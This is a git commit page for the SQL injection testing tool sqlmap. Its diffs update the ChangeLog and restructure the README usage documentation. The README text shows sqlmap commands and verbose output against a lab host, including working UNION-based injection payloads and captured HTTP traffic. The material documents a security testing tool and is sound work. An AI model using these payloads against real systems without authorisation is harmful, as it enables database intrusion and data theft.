sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2024-11-22 01:26:42 +03:00
Code Issues Packages Projects Releases Wiki Activity

sqlmap 0.6.3-rc4:

Browse Source 
Minor enhancement to be able to specify the number of seconds before
timeout the connection, default is set to 10 seconds.
Minor improvement to retry the HTTP request up to three times in case
an exception is raised during the connection to the target url.
Minor bug fix to correctly catch connection exceptions and notify to
the user also if they occur within a thread.
Minor code restyling.
Updated documentation.
This commit is contained in:
Bernardo Damele 2008-12-04 17:40:03 +00:00
parent 0f07e33e1a
commit 7f055924a7
16 changed files with 748 additions and 571 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
doc/ChangeLog
View File

@ -13,6 +13,8 @@ sqlmap (0.6.3-1) stable; urgency=low
the web application technology by parsing some HTTP response headers;
* Minor enhancement to fingerprint the back-end DBMS operating system by
parsing the DBMS banner value when -b option is provided;
* Minor enhancement to be able to specify the number of seconds before
timeout the connection, default is set to 10 seconds;
* Minor enhancement to be able to specify the number of seconds to wait
between each HTTP request providing option --delay #;
* Minor enhancement to be able to enumerate table columns and dump table
@ -23,15 +25,20 @@ sqlmap (0.6.3-1) stable; urgency=low
client HTTP headers (Accept, Accept-Encoding, etc);
* Minor improvements to sqlmap Debian package files: sqlmap uploaded
to official Debian project repository, on queue at the moment;
* Major bug fix to correctly handle httplib.BadStatusLine exception;
* Minor bug fix to handle session.error and session.timeout in HTTP
requests;
* Minor bug fix so that when the user provide a SELECT statement to be
* Minor improvement to use Python psyco (http://psyco.sourceforge.net/)
library if available to speed up the sqlmap algorithmic operations;
* Minor improvement to retry the HTTP request up to three times in case
an exception is raised during the connection to the target url;
* Major bug fix to correctly enumerate columns on Microsoft SQL Server;
* Major bug fix so that when the user provide a SELECT statement to be
processed with an asterisk as columns, now it also work if in the FROM
there is no database name specified;
* Minor bug fix to correctly enumerate columns on Microsoft SQL Server;
* Minor bug fix to correctly dump table entries when the column is
provided;
* Minor bug fix to correctly handle session.error, session.timeout and
httplib.BadStatusLine exceptions in HTTP requests;
* Minor bug fix to correctly catch connection exceptions and notify to
the user also if they occur within a thread;
* Increased default output level from 0 to 1;
* Updated documentation.

526
doc/README.html
View File

@ -37,14 +37,15 @@ for the latest version.</EM>
<H2><A NAME="toc5">5.</A> <A HREF="README.html#s5">Usage</A></H2>
<UL>
<LI><A NAME="toc5.1">5.1</A> <A HREF="README.html#ss5.1">Request</A>
<LI><A NAME="toc5.2">5.2</A> <A HREF="README.html#ss5.2">Techniques</A>
<LI><A NAME="toc5.1">5.1</A> <A HREF="README.html#ss5.1">Target</A>
<LI><A NAME="toc5.2">5.2</A> <A HREF="README.html#ss5.2">Request</A>
<LI><A NAME="toc5.3">5.3</A> <A HREF="README.html#ss5.3">Injection</A>
<LI><A NAME="toc5.4">5.4</A> <A HREF="README.html#ss5.4">Fingerprint</A>
<LI><A NAME="toc5.5">5.5</A> <A HREF="README.html#ss5.5">Enumeration</A>
<LI><A NAME="toc5.6">5.6</A> <A HREF="README.html#ss5.6">File system access</A>
<LI><A NAME="toc5.7">5.7</A> <A HREF="README.html#ss5.7">Operating system access</A>
<LI><A NAME="toc5.8">5.8</A> <A HREF="README.html#ss5.8">Miscellaneous</A>
<LI><A NAME="toc5.4">5.4</A> <A HREF="README.html#ss5.4">Techniques</A>
<LI><A NAME="toc5.5">5.5</A> <A HREF="README.html#ss5.5">Fingerprint</A>
<LI><A NAME="toc5.6">5.6</A> <A HREF="README.html#ss5.6">Enumeration</A>
<LI><A NAME="toc5.7">5.7</A> <A HREF="README.html#ss5.7">File system access</A>
<LI><A NAME="toc5.8">5.8</A> <A HREF="README.html#ss5.8">Operating system access</A>
<LI><A NAME="toc5.9">5.9</A> <A HREF="README.html#ss5.9">Miscellaneous</A>
</UL>
<P>
<H2><A NAME="toc6">6.</A> <A HREF="README.html#s6">Disclaimer</A></H2>
@ -84,10 +85,13 @@ Windows users can download and install the Python setup-ready installer
for x86, AMD64 and Itanium too.</P>
<P>Optionally, if you are running sqlmap on Windows, you may wish to install
<A HREF="http://ipython.scipy.org/moin/PyReadline/Intro">PyReadline</A>
to be able to take advantage of the sqlmap TAB completion and history
support functionalities in the SQL shell and OS shell.
library to be able to take advantage of the sqlmap TAB completion and
history support functionalities in the SQL shell and OS shell.
Note that these functionalities are available natively by Python official
readline library on other operating systems.</P>
readline library on other operating systems.
You can also choose to install
<A HREF="http://psyco.sourceforge.net/">Psyco</A>
library to speed up the sqlmap algorithmic operations.</P>
<H2><A NAME="ss1.2">1.2</A> <A HREF="#toc1.2">Scenario</A>
@ -348,20 +352,25 @@ $ python sqlmap.py -h
sqlmap/0.6.3 coded by Bernardo Damele A. G. &lt;bernardo.damele@gmail.com>
and Daniele Bellucci &lt;daniele.bellucci@gmail.com>
Usage: sqlmap.py [options] {-u "&lt;URL>" | -g "&lt;google dork>" | -c "&lt;config file>"}
Usage: sqlmap.py [options]
Options:
--version show program's version number and exit
-h, --help show this help message and exit
Request:
These options have to be specified to set the target url, HTTP method,
how to connect to the target url or Google dorking results in general.
Target:
At least one of these options has to be specified to set the source to
get target urls from.
-u URL, --url=URL Target url
-l LIST Parse targets from Burp or WebScarab logs
-g GOOGLEDORK Process Google dork results as target urls
-p TESTPARAMETER Testable parameter(s)
-c CONFIGFILE Load options from a configuration INI file
Request:
These options can be used to specify how to connect to the target url.
--method=METHOD HTTP method, GET or POST (default: GET)
--data=DATA Data string to be sent through POST
--cookie=COOKIE HTTP Cookie header
@ -373,8 +382,10 @@ Options:
--proxy=PROXY Use a HTTP proxy to connect to the target url
--threads=THREADS Maximum number of concurrent HTTP requests (default 1)
--delay=DELAY Delay in seconds between each HTTP request
--timeout=TIMEOUT Seconds to wait before timeout connection (default 10)
Injection:
-p TESTPARAMETER Testable parameter(s)
--string=STRING String to match in page when the query is valid
--dbms=DBMS Force back-end DBMS to this value
@ -385,11 +396,11 @@ Options:
--time-test Test for Time based blind SQL injection
--union-test Test for UNION query (inband) SQL injection
--union-use Use the UNION query (inband) SQL injection to
retrieve the queries output. No need to go blind
--union-use Use the UNION query (inband) SQL injection to retrieve
the queries output. No need to go blind
Fingerprint:
-f, --fingerprint Perform an extensive database fingerprint
-f, --fingerprint Perform an extensive DBMS version fingerprint
Enumeration:
These options can be used to enumerate the back-end database
@ -438,10 +449,9 @@ Options:
Miscellaneous:
--eta Retrieve each query output length and calculate the
estimated time of arrival in real time
-v VERBOSE Verbosity level: 0-5 (default 0)
-v VERBOSE Verbosity level: 0-5 (default 1)
--update Update sqlmap to the latest stable version
-s SESSIONFILE Save and resume all data retrieved on a session file
-c CONFIGFILE Load options from a configuration INI file
--save Save options on a configuration INI file
--batch Never ask for user input, use the default behaviour
</PRE>
@ -449,7 +459,7 @@ Options:
</P>
<H2><A NAME="ss5.1">5.1</A> <A HREF="#toc5.1">Request</A>
<H2><A NAME="ss5.1">5.1</A> <A HREF="#toc5.1">Target</A>
</H2>
<H3>Target URL</H3>
@ -675,7 +685,7 @@ Content-Type: text/html
</P>
<H3>List of targets</H3>
<H3>Parse targets from Burp or WebScarab logs</H3>
<P>Option: <CODE>-l</CODE></P>
@ -725,90 +735,33 @@ want to test this url? [y/N/q] y
</P>
<H3>Testable parameter(s)</H3>
<H3>Load options from a configuration INI file</H3>
<P>Option: <CODE>-p</CODE></P>
<P>Option: <CODE>-c</CODE></P>
<P>By default sqlmap tests all <CODE>GET</CODE> parameters, <CODE>POST</CODE>
parameters, HTTP <CODE>Cookie</CODE> header values and HTTP <CODE>User-Agent</CODE>
header value for dynamicity and SQL injection vulnerability, but it is
possible to manually specificy the parameter(s) you want sqlmap to perform
tests on comma separeted in order to skip dynamicity tests and perform SQL
injection test and inject directly only against the provided parameter(s).</P>
<P>Example on a <B>PostgreSQL 8.2.7</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&amp;cat=2" -v 1 \
-p "id"
[hh:mm:48] [INFO] testing connection to the target url
[hh:mm:48] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:49] [INFO] url is stable
[hh:mm:49] [INFO] testing if GET parameter 'id' is dynamic
[hh:mm:49] [INFO] confirming that GET parameter 'id' is dynamic
[hh:mm:49] [INFO] GET parameter 'id' is dynamic
[hh:mm:49] [INFO] testing sql injection on GET parameter 'id'
[hh:mm:49] [INFO] testing numeric/unescaped injection on GET parameter 'id'
[hh:mm:49] [INFO] confirming numeric/unescaped injection on GET parameter 'id'
[hh:mm:49] [INFO] GET parameter 'id' is numeric/unescaped injectable
[hh:mm:49] [INFO] testing for parenthesis on injectable parameter
[hh:mm:49] [INFO] the injectable parameter requires 0 parenthesis
[...]
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>Or, if you want to provide more than one parameter, for instance:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&amp;cat=2" -v 1 \
-p "cat,id"
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>You can also test only the HTTP <CODE>User-Agent</CODE> header.</P>
<P>It is possible to pass user's options from a configuration INI file, an
example is <CODE>sqlmap.conf</CODE>.</P>
<P>Example on a <B>MySQL 5.0.51</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat=2" -v 1 \
-p "user-agent" --user-agent "sqlmap/0.6.3 (http://sqlmap.sourceforge.net)"
$ python sqlmap.py -c "sqlmap.conf"
[hh:mm:40] [WARNING] the testable parameter 'user-agent' you provided is not into the GET
[hh:mm:40] [INFO] testing connection to the target url
[hh:mm:40] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:41] [INFO] url is stable
[hh:mm:41] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[hh:mm:41] [INFO] confirming that User-Agent parameter 'User-Agent' is dynamic
[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is dynamic
[hh:mm:41] [INFO] testing sql injection on User-Agent parameter 'User-Agent'
[hh:mm:41] [INFO] testing numeric/unescaped injection on User-Agent parameter 'User-Agent'
[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is not numeric/unescaped injectable
[hh:mm:41] [INFO] testing string/single quote injection on User-Agent parameter 'User-Agent'
[hh:mm:41] [INFO] confirming string/single quote injection on User-Agent parameter 'User-Agent'
[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is string/single quote injectable
[hh:mm:41] [INFO] testing for parenthesis on injectable parameter
[hh:mm:41] [INFO] the injectable parameter requires 0 parenthesis
[hh:mm:41] [INFO] testing MySQL
[hh:mm:41] [INFO] query: CONCAT(CHAR(52), CHAR(52))
[hh:mm:41] [INFO] retrieved: 44
[hh:mm:41] [INFO] performed 20 queries in 0 seconds
[hh:mm:41] [INFO] confirming MySQL
[hh:mm:41] [INFO] query: LENGTH(CHAR(52))
[hh:mm:41] [INFO] retrieved: 1
[hh:mm:41] [INFO] performed 13 queries in 0 seconds
[hh:mm:41] [INFO] query: SELECT 4 FROM information_schema.TABLES LIMIT 0, 1
[hh:mm:41] [INFO] retrieved: 4
[hh:mm:41] [INFO] performed 13 queries in 0 seconds
[hh:mm:42] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[hh:mm:42] [WARNING] GET parameter 'cat' is not dynamic
back-end DBMS: MySQL >= 5.0.0
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>Note that if you also provide other options from command line, those are
evaluated when running sqlmap and overwrite the same options, if set, in
the configuration file provided.</P>
<H2><A NAME="ss5.2">5.2</A> <A HREF="#toc5.2">Request</A>
</H2>
<H3>HTTP method: <CODE>GET</CODE> or <CODE>POST</CODE></H3>
@ -1213,162 +1166,102 @@ seven HTTP requests, the maximum to retrieve a query output character.</P>
request. The valid value is a float, for instance 0.5.</P>
<H2><A NAME="ss5.2">5.2</A> <A HREF="#toc5.2">Techniques</A>
<H3>Seconds to wait before timeout connection</H3>
<P>Option: <CODE>--timeout</CODE></P>
<P>It is possible to specify a number of seconds to wait before considering
the HTTP connection timed out. The valid value is a float, for instance
10.5.</P>
<H2><A NAME="ss5.3">5.3</A> <A HREF="#toc5.3">Injection</A>
</H2>
<H3>Test for Time Based Blind SQL injection</H3>
<H3>Testable parameter(s)</H3>
<P>Option: <CODE>--time-test</CODE></P>
<P>TODO</P>
<H3>Test for UNION query SQL injection</H3>
<P>Option: <CODE>--union-test</CODE></P>
<P>It is possible to test if the target URL is affected by an <B>inband
SQL injection</B> vulnerability.
Refer to the <EM>Techniques</EM> section for details on this SQL injection
technique.</P>
<P>Example on an <B>Oracle XE 10.2.0.1</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1&amp;cat=2" \
--union-test -v 1
[...]
back-end DBMS: Oracle
[hh:mm:55] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:55] [INFO] the target url could be affected by an inband sql injection vulnerability
valid union: 'http://192.168.1.121:80/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT
NULL, NULL, NULL FROM DUAL-- AND 5601=5601&amp;cat=2'
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>Option: <CODE>-p</CODE></P>
<P>By default sqlmap tests all <CODE>GET</CODE> parameters, <CODE>POST</CODE>
parameters, HTTP <CODE>Cookie</CODE> header values and HTTP <CODE>User-Agent</CODE>
header value for dynamicity and SQL injection vulnerability, but it is
possible to manually specificy the parameter(s) you want sqlmap to perform
tests on comma separeted in order to skip dynamicity tests and perform SQL
injection test and inject directly only against the provided parameter(s).</P>
<P>Example on a <B>PostgreSQL 8.2.7</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1&amp;cat=2" \
--union-test -v 1
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&amp;cat=2" -v 1 \
-p "id"
[hh:mm:48] [INFO] testing connection to the target url
[hh:mm:48] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:49] [INFO] url is stable
[hh:mm:49] [INFO] testing if GET parameter 'id' is dynamic
[hh:mm:49] [INFO] confirming that GET parameter 'id' is dynamic
[hh:mm:49] [INFO] GET parameter 'id' is dynamic
[hh:mm:49] [INFO] testing sql injection on GET parameter 'id'
[hh:mm:49] [INFO] testing numeric/unescaped injection on GET parameter 'id'
[hh:mm:49] [INFO] confirming numeric/unescaped injection on GET parameter 'id'
[hh:mm:49] [INFO] GET parameter 'id' is numeric/unescaped injectable
[hh:mm:49] [INFO] testing for parenthesis on injectable parameter
[hh:mm:49] [INFO] the injectable parameter requires 0 parenthesis
[...]
back-end DBMS: PostgreSQL
[hh:mm:05] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:05] [INFO] the target url could be affected by an inband sql injection vulnerability
valid union: 'http://192.168.1.121:80/sqlmap/pgsql/get_str.php?id=1' UNION ALL SELECT
NULL, NULL, NULL-- AND 'QOAtA'='QOAtA&amp;cat=2'
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>As you can see, the target URL parameter <CODE>id</CODE> might be also
affected by an inband SQL injection.
In case this vulnerability is exploitable it is strongly recommended to
use it.</P>
<H3>Use the UNION query SQL injection</H3>
<P>Option: <CODE>--union-use</CODE></P>
<P>Providing the <CODE>--union-use</CODE> parameter, sqlmap will first test if
the target URL is affected by an <B>inband SQL injection</B>
(<CODE>--union-test</CODE>) vulnerability then, in case it is vulnerable and
exploitable, it will trigger this vulnerability to retrieve the output of
the <CODE>SELECT</CODE> queries.</P>
<P>Example on a <B>Microsoft SQL Server 2000 Service Pack 0</B> target:</P>
<P>Or, if you want to provide more than one parameter, for instance:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&amp;cat=2" -v 1 \
--union-use --banner
[...]
back-end DBMS: Microsoft SQL Server 2000
[hh:mm:42] [INFO] fetching banner
[hh:mm:42] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:42] [INFO] the target url could be affected by an inband sql injection vulnerability
[hh:mm:42] [INFO] confirming inband sql injection on parameter 'id'
[hh:mm:42] [INFO] the target url is affected by an exploitable inband sql injection
vulnerability
[hh:mm:42] [INFO] query: UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+
CHAR(84)+CHAR(70))+ISNULL(CAST(@@VERSION AS VARCHAR(8000)), (CHAR(32)))+(CHAR(70)+CHAR(82)+
CHAR(100)+CHAR(106)+CHAR(72)+CHAR(75)), NULL-- AND 5204=5204
[hh:mm:42] [INFO] performed 3 queries in 0 seconds
banner:
---
Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
Aug 6 2000 00:57:48
Copyright (c) 1988-2000 Microsoft Corporation
Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
---
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&amp;cat=2" -v 1 \
-p "cat,id"
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>As you can see, the vulnerable parameter (<CODE>id</CODE>) is affected by both
blind SQL injection and exploitable inband SQL injection vulnerabilities.</P>
<P>You can also test only the HTTP <CODE>User-Agent</CODE> header.</P>
<P>Example on a <B>MySQL 5.0.51</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat=2" -v 5 \
--union-use --banner
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/ua_str.php" -v 1 \
-p "user-agent" --user-agent "sqlmap/0.6.3 (http://sqlmap.sourceforge.net)"
[...]
[hh:mm:25] [INFO] the target url is affected by an exploitable inband sql injection
vulnerability
[hh:mm:25] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(98,108,76,79,106,78),
IFNULL(CAST(VERSION() AS CHAR(10000)), CHAR(32)),CHAR(122,110,105,89,121,65)), NULL--
AND 6043=6043
[hh:mm:25] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2898
%2C108%2C76%2C79%2C106%2C78%29%2CIFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%2810000%29%29
%2C%20CHAR%2832%29%29%2CCHAR%28122%2C110%2C105%2C89%2C121%2C65%29%29%2C%20NULL--%20AND%2
06043=6043&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:25] [TRAFFIC IN] HTTP response (OK - 200):
Date: Mon, 28 Jul 2008 22:34:25 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8
OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.2
Content-Length: 194
Connection: close
Content-Type: text/html
&lt;html&gt;&lt;body&gt;
&lt;b&gt;SQL results:&lt;/b&gt;
&lt;table border="1"&gt;
&lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;luther&lt;/td&gt;&lt;td&gt;blissett&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;blLOjN5.0.51a-3ubuntu5.2zniYyA&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;
&lt;/body&gt;&lt;/html&gt;
[hh:mm:25] [INFO] performed 3 queries in 0 seconds
banner: '5.0.51a-3ubuntu5.2'
[hh:mm:40] [WARNING] the testable parameter 'user-agent' you provided is not into the GET
[hh:mm:40] [INFO] testing connection to the target url
[hh:mm:40] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:41] [INFO] url is stable
[hh:mm:41] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[hh:mm:41] [INFO] confirming that User-Agent parameter 'User-Agent' is dynamic
[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is dynamic
[hh:mm:41] [INFO] testing sql injection on User-Agent parameter 'User-Agent'
[hh:mm:41] [INFO] testing numeric/unescaped injection on User-Agent parameter 'User-Agent'
[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is not numeric/unescaped injectable
[hh:mm:41] [INFO] testing string/single quote injection on User-Agent parameter 'User-Agent'
[hh:mm:41] [INFO] confirming string/single quote injection on User-Agent parameter 'User-Agent'
[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is string/single quote injectable
[hh:mm:41] [INFO] testing for parenthesis on injectable parameter
[hh:mm:41] [INFO] the injectable parameter requires 0 parenthesis
[hh:mm:41] [INFO] testing MySQL
[hh:mm:41] [INFO] query: CONCAT(CHAR(52), CHAR(52))
[hh:mm:41] [INFO] retrieved: 44
[hh:mm:41] [INFO] performed 20 queries in 0 seconds
[hh:mm:41] [INFO] confirming MySQL
[hh:mm:41] [INFO] query: LENGTH(CHAR(52))
[hh:mm:41] [INFO] retrieved: 1
[hh:mm:41] [INFO] performed 13 queries in 0 seconds
[hh:mm:41] [INFO] query: SELECT 4 FROM information_schema.TABLES LIMIT 0, 1
[hh:mm:41] [INFO] retrieved: 4
[hh:mm:41] [INFO] performed 13 queries in 0 seconds
back-end DBMS: MySQL >= 5.0.0
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>As you can see, the MySQL <CODE>version()</CODE> function (banner) output is
nested (inband) within the HTTP response page, this makes the inband SQL
injection exploitable.</P>
<H2><A NAME="ss5.3">5.3</A> <A HREF="#toc5.3">Injection</A>
</H2>
<H3>String match</H3>
@ -1564,7 +1457,161 @@ back-end database management system. If you do not know it, let sqlmap
automatically identify it for you.</P>
<H2><A NAME="ss5.4">5.4</A> <A HREF="#toc5.4">Fingerprint</A>
<H2><A NAME="ss5.4">5.4</A> <A HREF="#toc5.4">Techniques</A>
</H2>
<H3>Test for Time Based blind SQL injection</H3>
<P>Option: <CODE>--time-test</CODE></P>
<P>TODO</P>
<H3>Test for UNION query SQL injection</H3>
<P>Option: <CODE>--union-test</CODE></P>
<P>It is possible to test if the target URL is affected by an <B>inband
SQL injection</B> vulnerability.
Refer to the <EM>Techniques</EM> section for details on this SQL injection
technique.</P>
<P>Example on an <B>Oracle XE 10.2.0.1</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1&amp;cat=2" \
--union-test -v 1
[...]
back-end DBMS: Oracle
[hh:mm:55] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:55] [INFO] the target url could be affected by an inband sql injection vulnerability
valid union: 'http://192.168.1.121:80/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT
NULL, NULL, NULL FROM DUAL-- AND 5601=5601&amp;cat=2'
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>Example on a <B>PostgreSQL 8.2.7</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1&amp;cat=2" \
--union-test -v 1
[...]
back-end DBMS: PostgreSQL
[hh:mm:05] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:05] [INFO] the target url could be affected by an inband sql injection vulnerability
valid union: 'http://192.168.1.121:80/sqlmap/pgsql/get_str.php?id=1' UNION ALL SELECT
NULL, NULL, NULL-- AND 'QOAtA'='QOAtA&amp;cat=2'
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>As you can see, the target URL parameter <CODE>id</CODE> might be also
affected by an inband SQL injection.
In case this vulnerability is exploitable it is strongly recommended to
use it.</P>
<H3>Use the UNION query SQL injection</H3>
<P>Option: <CODE>--union-use</CODE></P>
<P>Providing the <CODE>--union-use</CODE> parameter, sqlmap will first test if
the target URL is affected by an <B>inband SQL injection</B>
(<CODE>--union-test</CODE>) vulnerability then, in case it is vulnerable and
exploitable, it will trigger this vulnerability to retrieve the output of
the <CODE>SELECT</CODE> queries.</P>
<P>Example on a <B>Microsoft SQL Server 2000 Service Pack 0</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&amp;cat=2" -v 1 \
--union-use --banner
[...]
back-end DBMS: Microsoft SQL Server 2000
[hh:mm:42] [INFO] fetching banner
[hh:mm:42] [INFO] testing inband sql injection on parameter 'id'
[hh:mm:42] [INFO] the target url could be affected by an inband sql injection vulnerability
[hh:mm:42] [INFO] confirming inband sql injection on parameter 'id'
[hh:mm:42] [INFO] the target url is affected by an exploitable inband sql injection
vulnerability
[hh:mm:42] [INFO] query: UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+
CHAR(84)+CHAR(70))+ISNULL(CAST(@@VERSION AS VARCHAR(8000)), (CHAR(32)))+(CHAR(70)+CHAR(82)+
CHAR(100)+CHAR(106)+CHAR(72)+CHAR(75)), NULL-- AND 5204=5204
[hh:mm:42] [INFO] performed 3 queries in 0 seconds
banner:
---
Microsoft SQL Server 2000 - 8.00.194 (Intel X86)
Aug 6 2000 00:57:48
Copyright (c) 1988-2000 Microsoft Corporation
Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
---
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>As you can see, the vulnerable parameter (<CODE>id</CODE>) is affected by both
blind SQL injection and exploitable inband SQL injection vulnerabilities.</P>
<P>Example on a <B>MySQL 5.0.51</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&amp;cat=2" -v 5 \
--union-use --banner
[...]
[hh:mm:25] [INFO] the target url is affected by an exploitable inband sql injection
vulnerability
[hh:mm:25] [INFO] query: UNION ALL SELECT NULL, CONCAT(CHAR(98,108,76,79,106,78),
IFNULL(CAST(VERSION() AS CHAR(10000)), CHAR(32)),CHAR(122,110,105,89,121,65)), NULL--
AND 6043=6043
[hh:mm:25] [TRAFFIC OUT] HTTP request:
GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2898
%2C108%2C76%2C79%2C106%2C78%29%2CIFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%2810000%29%29
%2C%20CHAR%2832%29%29%2CCHAR%28122%2C110%2C105%2C89%2C121%2C65%29%29%2C%20NULL--%20AND%2
06043=6043&amp;cat=2 HTTP/1.1
Host: 192.168.1.121:80
User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
Connection: close
[hh:mm:25] [TRAFFIC IN] HTTP response (OK - 200):
Date: Mon, 28 Jul 2008 22:34:25 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8
OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.2
Content-Length: 194
Connection: close
Content-Type: text/html
&lt;html&gt;&lt;body&gt;
&lt;b&gt;SQL results:&lt;/b&gt;
&lt;table border="1"&gt;
&lt;tr&gt;&lt;td&gt;1&lt;/td&gt;&lt;td&gt;luther&lt;/td&gt;&lt;td&gt;blissett&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;/td&gt;&lt;td&gt;blLOjN5.0.51a-3ubuntu5.2zniYyA&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;
&lt;/body&gt;&lt;/html&gt;
[hh:mm:25] [INFO] performed 3 queries in 0 seconds
banner: '5.0.51a-3ubuntu5.2'
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>As you can see, the MySQL <CODE>version()</CODE> function (banner) output is
nested (inband) within the HTTP response page, this makes the inband SQL
injection exploitable.</P>
<H2><A NAME="ss5.5">5.5</A> <A HREF="#toc5.5">Fingerprint</A>
</H2>
<H3>Extensive database management system fingerprint</H3>
@ -1779,7 +1826,7 @@ parsing library that fetches data from Chip Andrews'
<A HREF="http://www.sqlsecurity.com/FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx">SQLSecurity.com site</A> and outputs it to the XML versions file.</P>
<H2><A NAME="ss5.5">5.5</A> <A HREF="#toc5.5">Enumeration</A>
<H2><A NAME="ss5.6">5.6</A> <A HREF="#toc5.6">Enumeration</A>
</H2>
<H3>Banner</H3>
@ -2250,7 +2297,7 @@ databases tables, only the users' schema that the web application's user
is connected to, which is always <CODE>public</CODE>.</P>
<H3>Dump database tables entries</H3>
<H3>Dump database table entries</H3>
<P>Options: <CODE>--dump</CODE>, <CODE>-C</CODE>, <CODE>-T</CODE>, <CODE>-D</CODE>,
<CODE>--start</CODE> and <CODE>--stop</CODE></P>
@ -2349,8 +2396,8 @@ $ cat /software/sqlmap/output/192.168.1.121/dump/public/users.csv
</CODE></BLOCKQUOTE>
</P>
<P>You can also provide the <CODE>--start</CODE> and/or the <CODE>--stop</CODE> option
to limit the dump to a range of entries.</P>
<P>You can also provide the <CODE>--start</CODE> and/or the <CODE>--stop</CODE>
options to limit the dump to a range of entries.</P>
<P>
<UL>
<LI><CODE>--start</CODE> specifies the first entry to enumerate</LI>
@ -2859,7 +2906,7 @@ column names of the table then asks if the query can return multiple
entries and goes on.</P>
